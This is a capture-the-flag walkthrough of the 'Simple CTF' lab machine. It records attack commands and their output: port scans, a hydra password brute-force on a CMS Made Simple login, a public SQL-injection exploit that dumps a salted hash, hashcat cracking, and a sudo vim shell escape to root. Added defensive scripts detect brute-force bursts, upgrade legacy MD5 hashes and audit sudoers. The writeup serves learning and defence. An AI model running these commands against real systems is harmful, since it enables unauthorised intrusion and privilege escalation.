Simple CTF

✔️ INFORMATION GATHERING

rustscan:

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.74.102 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.74.102:80
Open 10.10.74.102:2222
Open 10.10.74.102:21
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 00:54 EST
Initiating Ping Scan at 00:54
Scanning 10.10.74.102 [4 ports]
Completed Ping Scan at 00:54, 0.50s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:54
Completed Parallel DNS resolution of 1 host. at 00:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 00:54
Scanning 10.10.74.102 [3 ports]
Discovered open port 2222/tcp on 10.10.74.102
Discovered open port 80/tcp on 10.10.74.102
Completed SYN Stealth Scan at 00:54, 7.64s elapsed (3 total ports)
Nmap scan report for 10.10.74.102
Host is up, received echo-reply ttl 61 (0.45s latency).
Scanned at 2021-11-10 00:54:15 EST for 8s
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
80/tcp open http syn-ack ttl 61
2222/tcp open EtherNetIP-1 syn-ack ttl 61
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
Raw packets sent: 11 (460B) | Rcvd: 3 (116B)

open ports:

  • 21: FTP
  • 80: HTTP
  • 2222: EtherNetIP-1 (nmap's guess from the port number; version detection below identifies it as SSH)

nmap:

┌──(root💀kali)-[~]
└─# nmap 10.10.74.102 -sV -p80,21,2222
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 01:48 EST
Nmap scan report for 10.10.74.102
Host is up (0.39s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

port 80:

Web server on port 80 (screenshots of the landing page and its source, not reproduced here); next, directory enumeration:
┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 01:24:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.74.102/simple/]

===============================================================
2021/11/10 01:25:13 Finished
===============================================================
/simple runs CMS Made Simple; the version number is visible on the page (screenshot) and is used for the searchsploit query:
┌──(root💀kali)-[~]
└─# searchsploit "cms made simple 2.2.8"
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root):
530 This FTP server is anonymous only.
Login failed.
ftp>
┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.80 secs (0.2035 kB/s)
ftp>
ForMitch.txt:
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
robots.txt (screenshot of its contents); next, enumeration under /simple:
┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102/simple -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102/simple
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 02:00:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/admin (Status: 301) [Size: 319] [--> http://10.10.74.102/simple/admin/]
/assets (Status: 301) [Size: 320] [--> http://10.10.74.102/simple/assets/]
/doc (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/doc/]
/index.php (Status: 200) [Size: 19913]
/lib (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/lib/]
/modules (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/modules/]
/tmp (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/tmp/]
/uploads (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/uploads/]

===============================================================
2021/11/10 02:01:34 Finished
===============================================================
The CMS admin login page at /simple/admin (screenshot); the login POST is captured to get the form field names and the failure message that the hydra command needs:
┌──(root💀kali)-[~]
└─# hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.190.16 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect" -t 50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 17:47:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://10.10.190.16:80/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect
[80][http-post-form] host: 10.10.190.16 login: mitch password: secret
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-10 17:47:40
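From the defender's side, the hydra run above is very loud: thousands of POSTs to /simple/admin/login.php from one address in about ten seconds. The script below is an added example (not part of the writeup) that flags such bursts in Apache combined-format access logs; the log lines, IPs and timestamps in build_sample() are constructed, and the threshold and window are assumptions to tune per site.

```python
"""Brute-force detection over web server access logs.

Added example (not part of the original writeup): the hydra run above sends
thousands of POSTs to /simple/admin/login.php in seconds, which is easy to spot
in Apache's combined log format. The log lines below are constructed to imitate
that traffic; the IPs and timestamps are made up."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict with ip/ts/method/path/status, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bursts(lines, login_path="/simple/admin/login.php", threshold=20, window_s=60):
    """Map each source IP that POSTed to login_path at least `threshold` times
    inside some `window_s`-second window to its peak count in such a window."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    window = timedelta(seconds=window_s)
    for ip, stamps in posts.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):          # sliding window over sorted timestamps
            while t - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def build_sample():
    """Constructed log lines: a 30-request burst from 10.9.1.5 within 10 seconds,
    plus normal browsing and one legitimate login from 10.9.1.7."""
    base = datetime(2021, 11, 10, 17, 47, 30, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'
    lines = []
    for i in range(30):
        lines.append(fmt.format(ip="10.9.1.5", ts=(base + timedelta(seconds=i // 3)).strftime(TS_FMT),
                                method="POST", path="/simple/admin/login.php", status=200,
                                ua="Mozilla/5.0 (constructed)"))
    lines.append(fmt.format(ip="10.9.1.7", ts=base.strftime(TS_FMT), method="GET",
                            path="/simple/", status=200, ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="10.9.1.7", ts=(base + timedelta(seconds=5)).strftime(TS_FMT),
                            method="POST", path="/simple/admin/login.php", status=302, ua="Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, n in find_bursts(build_sample()).items():
        print(f"ALERT: {ip} made {n} login POSTs inside 60s")
```

The count is keyed on method and path rather than on status, because the failed logins hydra matched on return 200 with the "User name or password incorrect" text in the body, so the status code alone does not separate them from successes. Rate limiting or lockout on that endpoint is the corresponding mitigation.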
┌──(root💀kali)-[~]
└─# searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/46635.py

✔️ EXPLOITATION

I rename the script to cms-sql-exploit.py and run it:

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
File "/root/cms-sql-exploit.py", line 25
print "[+] Specify an url target"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?
The script is written for Python 2, so convert it first: 2to3 -w cms-sql-exploit.py (-w writes the changes back to the file).
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py -u http://10.10.104.126/simple --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 1dajXcz
[+] Username found: ji
[+] Email found: adv
[+] Password found: 0c01sf
[*] Try: 000000
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[*] Try: 0c01f4468bd75d7a84c7eb73846e8d96$
[*] Now try to crack password
Traceback (most recent call last):
File "/root/cms-sql-exploit.py", line 184, in <module>
crack_password()
File "/root/cms-sql-exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.9/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte
┌──(root💀kali)-[~]
└─# hashid
0c01f4468bd75d7a84c7eb73846e8d96
Analyzing '0c01f4468bd75d7a84c7eb73846e8d96'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
┌──(root💀kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0c01f4468bd75d7a84c7eb73846e8d96

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
C:\Users\szero\Desktop\hashcat-6.2.4>hashcat.exe --help | findstr md5
70 | md5(utf16le($pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
hashcat example (the hash and salt from the exploit output, joined with a colon):
hashcat64.exe -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt
hashcat64.exe -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
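Hashcat modes 10 and 20 are md5($pass.$salt) and md5($salt.$pass); a single unsalted-strength MD5 is why a wordlist hit comes back instantly. The following is an added example, not code from the writeup or from CMS Made Simple: it tells which of the two constructions a stored hash uses for a known password (a check worth doing when reporting the finding), and shows how an application could replace such a hash with PBKDF2-HMAC-SHA256 on the user's next successful login. The row format and iteration count are assumptions.

```python
"""Legacy salted-MD5 check and upgrade path.

Added example, not from the writeup or from CMS Made Simple: hashcat modes 10
and 20 above correspond to md5($pass.$salt) and md5($salt.$pass). The helpers
below tell which construction a stored hash uses for a known password and show
how an application can replace such a hash with PBKDF2-HMAC-SHA256 the next
time the user logs in successfully."""
import hashlib
import hmac
import os


def legacy_md5(salt, password, salt_first=True):
    """md5($salt.$pass) when salt_first, else md5($pass.$salt)."""
    data = salt + password if salt_first else password + salt
    return hashlib.md5(data.encode()).hexdigest()


def identify_construction(stored_hex, salt, candidate):
    """Return 'md5(salt.pass)', 'md5(pass.salt)' or None, depending on which
    construction (if any) maps candidate to stored_hex."""
    if hmac.compare_digest(legacy_md5(salt, candidate, True), stored_hex):
        return "md5(salt.pass)"
    if hmac.compare_digest(legacy_md5(salt, candidate, False), stored_hex):
        return "md5(pass.salt)"
    return None


PBKDF2_ITERS = 600_000  # assumed iteration count; tune so a login costs ~100 ms on the server


def pbkdf2_record(password, salt=None):
    """Produce a self-describing record: algo$iters$salt_hex$dk_hex (assumed format)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERS)
    return f"pbkdf2_sha256${PBKDF2_ITERS}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(record, password):
    _algo, iters, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login_and_upgrade(user_row, password):
    """Verify a login against either a legacy row ({'hash','salt'}) or an
    upgraded row ({'record'}); on success with a legacy row, return a new row
    that stores a PBKDF2 record instead. Returns (ok, row_to_store)."""
    if "record" in user_row:
        return verify_pbkdf2(user_row["record"], password), user_row
    if identify_construction(user_row["hash"], user_row["salt"], password) is None:
        return False, user_row
    return True, {"record": pbkdf2_record(password)}


if __name__ == "__main__":
    # Values from the writeup's hashcat result line (hash:salt:password).
    print(identify_construction("0c01f4468bd75d7a84c7eb73846e8d96",
                                "1dac0d92e9fa6bb2", "secret"))
```

The upgrade can only happen at login time because the plaintext is needed to compute the new hash; until every active user has logged in once, the remaining legacy rows are still exposed to exactly the attack shown above.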
┌──(root💀kali)-[~]
└─# ssh mitch@10.10.24.159 -p 2222
The authenticity of host '[10.10.24.159]:2222 ([10.10.24.159]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.24.159]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.24.159's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ ls
user.txt
$ cd ..
$ ls
mitch sunbath

✔️ PRIVILEGE ESCALATION

manual enumeration:

-sh: 8: cd: can't cd to sunbath
$ find / -type f -user root -perm /4000 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/fusermount
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
$
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh' (vim runs as root, and its :! command starts a shell)
$ sudo vim -c ":!/bin/bash"
root@Machine:/home#
root@Machine:/# cd root/
root@Machine:/root# cat root.txt
*********************
root@Machine:/root#
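The root cause is the sudoers rule itself: a NOPASSWD grant of an editor to root is a grant of root. Below is an added example (not from the writeup) of an audit script that parses sudoers-format rules and flags such entries; SAMPLE_SUDOERS is constructed to reproduce the rule shown by sudo -l above, and the other entries and the SHELL_CAPABLE list are assumptions.

```python
"""Sudoers audit for passwordless root via shell-escaping programs.

Added example, not from the writeup: the escalation above works because sudo
lets mitch run vim as root without a password and vim's :! runs a shell. This
script parses sudoers-format rules and flags such grants. SAMPLE_SUDOERS is a
constructed file that reproduces the rule shown by `sudo -l` above; the other
entries are made up."""
import re

# Interactive programs whose built-in escape can start a shell (the writeup uses vim's :!).
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "man"}

# user|%group  host=(runas[:group]) [TAG: ...] cmd1, cmd2, ...
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\))?\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias",
                 "Runas_Alias", "@include", "#include")


def parse_sudoers(text):
    """Return a list of {who, runas, nopasswd, cmds} dicts, one per user/group rule."""
    rules = []
    for raw in text.splitlines():
        if raw.startswith(SKIP_PREFIXES):
            continue
        line = raw.split("#", 1)[0].strip()   # drop comments
        m = RULE_RE.match(line) if line else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append({"who": m["who"], "runas": runas,
                      "nopasswd": "NOPASSWD" in tags, "cmds": cmds})
    return rules


def audit(rules):
    """Return (who, command, reason) findings for rules that grant root."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        for cmd in r["cmds"]:
            prog = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" and r["nopasswd"]:
                findings.append((r["who"], cmd, "NOPASSWD ALL grants unrestricted root"))
            elif prog in SHELL_CAPABLE:
                prefix = "NOPASSWD " if r["nopasswd"] else ""
                findings.append((r["who"], cmd, f"{prefix}root shell via {prog}'s shell escape"))
    return findings


SAMPLE_SUDOERS = """\
# constructed sample, not the target's real /etc/sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    for who, cmd, why in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who}: {cmd} -> {why}")
```

Passworded grants of the same programs are flagged too, because the password only slows the escalation down; the fix is to grant a narrower command (for example sudoedit on the specific file), not to add a password prompt.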

Surya Dev Singh

enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs